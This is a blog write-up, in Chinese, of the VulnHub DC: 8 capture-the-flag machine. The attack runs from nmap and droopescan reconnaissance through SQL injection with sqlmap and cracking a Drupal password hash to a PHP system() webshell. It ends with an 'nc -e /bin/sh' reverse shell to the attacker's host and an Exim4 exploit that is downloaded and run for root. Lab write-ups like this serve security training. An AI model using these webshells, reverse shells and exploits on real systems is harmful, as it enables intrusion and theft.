Site icon MkS

[資訊安全] VulnHub – DC: 8 Write-up

原本預計在過年連假以前將 DC 系列題目解完,至今卻只解到 DC: 8,一不小心就欠過年了,現在積極還債,不過除了該題以外也只剩下 DC: 9 一題,順利的話應該可以在這週內將 DC 系列全部攻略。

環境設定

VirtualBox: Kali & DC: 8
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.1
Host is up (0.011s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0014s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
Nmap scan report for 10.0.2.19
Host is up (0.00091s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.96 seconds

$ nmap 10.0.2.19 -p- -A                       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.19
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds

解題過程

Wappalyzer

發現 DC: 8 是個 Drupal 7 的 CMS 服務,作者好像很喜歡用 Drupal?

Droopescan

這部分發現一個小工具,如圖 wpscan 一般,可以針對 Durpal 自動情資蒐集,以省下人力成本。

$ droopescan scan drupal -u 10.0.2.19  
[+] Plugins found:                                                              
    ctools http://10.0.2.19/sites/all/modules/ctools/
        http://10.0.2.19/sites/all/modules/ctools/LICENSE.txt
        http://10.0.2.19/sites/all/modules/ctools/API.txt
    views http://10.0.2.19/sites/all/modules/views/
        http://10.0.2.19/sites/all/modules/views/README.txt
        http://10.0.2.19/sites/all/modules/views/LICENSE.txt
    webform http://10.0.2.19/sites/all/modules/webform/
        http://10.0.2.19/sites/all/modules/webform/README.md
        http://10.0.2.19/sites/all/modules/webform/LICENSE.txt
    ckeditor http://10.0.2.19/sites/all/modules/ckeditor/
        http://10.0.2.19/sites/all/modules/ckeditor/CHANGELOG.txt
        http://10.0.2.19/sites/all/modules/ckeditor/README.txt
        http://10.0.2.19/sites/all/modules/ckeditor/LICENSE.txt
    better_formats http://10.0.2.19/sites/all/modules/better_formats/
        http://10.0.2.19/sites/all/modules/better_formats/README.txt
        http://10.0.2.19/sites/all/modules/better_formats/LICENSE.txt
    profile http://10.0.2.19/modules/profile/
    php http://10.0.2.19/modules/php/
    image http://10.0.2.19/modules/image/

[+] Themes found:
    seven http://10.0.2.19/themes/seven/
    garland http://10.0.2.19/themes/garland/

[+] Possible version(s):
    7.67

[+] Possible interesting urls found:
    Default changelog file - http://10.0.2.19/CHANGELOG.txt
    Default admin - http://10.0.2.19/user/login

Get the Shell

透過 Droopescan 得到版本號為 7.67,而線上 exploit 版本都是 < 7.58,這也表示該題可能不是像 DC: 1 透過已知的弱點來 RCE,轉而查看系統上已安裝的 Plugin 套件,但也沒有什麼發現。

最後在閒逛網站發現 nid=1 反射動作的直接加上單引號出現了錯誤訊息,其實有點意外,畢竟是 CMS 然後出現這種極為常見的 SQL Injection 弱點。

隨後就直上 sqlmap 拿到了管理員密碼。

$ sqlmap -u "http://10.0.2.19/?nid=1" -D d7db -T users --dump
Database: d7db                                                                                                                                               
Table: users
[3 entries]
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| uid | data                                                                                                                                                                        | init                | mail                  | name    | pass                                                    | login      | theme   | access     | status | created    | picture | timezone           | signature | language   | signature_format |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| 0   | NULL                                                                                                                                                                        | <blank>             | <blank>               | <blank> | <blank>                                                 | 0          | <blank> | 0          | 0      | 0          | 0       | NULL               | <blank>   | <blank>    | NULL             |
| 1   | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;}                                                                                                                                  | dc8blah@dc8blah.org | dcau-user@outlook.com | admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | <blank> | 1567766818 | 1      | 1567489015 | 0       | Australia/Brisbane | <blank>   | <blank>    | filtered_html    |
| 2   | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john@blahsdfsfd.org | john@blahsdfsfd.org   | john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | <blank> | 1567498512 | 1      | 1567489250 | 0       | Australia/Brisbane | <blank>   | <blank>    | filtered_html    |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+mpm---------+--------------------+-----------+------------+------------------+

這邊有個提示,使用者名稱 john 跟 John the Ripper (JTR) 破密工具同名,顧名思義就是要你破 john 的密碼?

$ echo -en "\$S\$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" > john.hash 

$ john john.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle           (?)
1g 0:00:00:02 DONE (2021-02-17 15:24) 0.3745g/s 188.7p/s 188.7c/s 188.7C/s turtle..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completed

取得密碼組 john/turtle 並登入成功,隨後在編輯模式下發現與 DC: 7 一樣的編輯工具,並且可以切換成 PHP Code 模式,這也與 Droopescan 的偵查到含有安裝 PHP 套件的結果相符。

接著就可以把 WebShell 寫在這個地方。

<?php
echo system($_POST['cmd']);
?>

成功取得 Webshell。

Get Reverse shell

接著就是一樣的套路,建立 nc 再送 Payload 丟一個 Reverse shell 回來。

Listen

nc -nl -vv -p 8888

Victim

nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"

Get Root to Win

SUID Check

查看 SUID 發現 exim4 存放位置與其他不相同,於是簡單 Google 發現是個 SMTP 套件,並發現它含有可利用的 Exploit 弱點。

Exim4 是 Debian 默認的 MTA (Message Transfer Agent) ,連基本系統裡面都 有它,用他自然是和系統兼容性最好的了。在 Debian 下配置 Exim 很方便,系 統提供了一個配置腳本,可以通過回答問題的方式來進行配置。

https://lifegoo.pluskid.org/wiki/Exim4.html
www-data@dc-8:/tmp $ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

Get Root

發現 Exim4 含有弱點並且可以用來提權,就直接嘗試 exploit,但下載下來會有 ^M(/r) 的問題,這部分由於之前遇過,並且使用 cat << EOF > FileName 的方式解決,但這部分因為不知明原因導致在 EOF 結束後會出現意外結束。

也感謝熱情的同事提供相關經驗與做法,使用過 set ff=unix 解決問題,但在 Reverse shell 環境下使用 vi 一直無法成功,透過 vi 的 :%s/^M/\r/g 置換 ^M 也有些問題,最簡單的方式則是在本地端建立已經去除 ^M 的版本,並提供給靶機下載。

Listen
wget https://www.exploit-db.com/download/46996
vi 46996
:set ff=unix
python -m SimpleHTTPServer
Victim
wget http://10.0.2.15:8000/46996
chmod +x 46996
bash 46996 -m netcat
whoami

Flag

cat /root/flag.txt

Brilliant - you have succeeded!!!

888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888

Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
Exit mobile version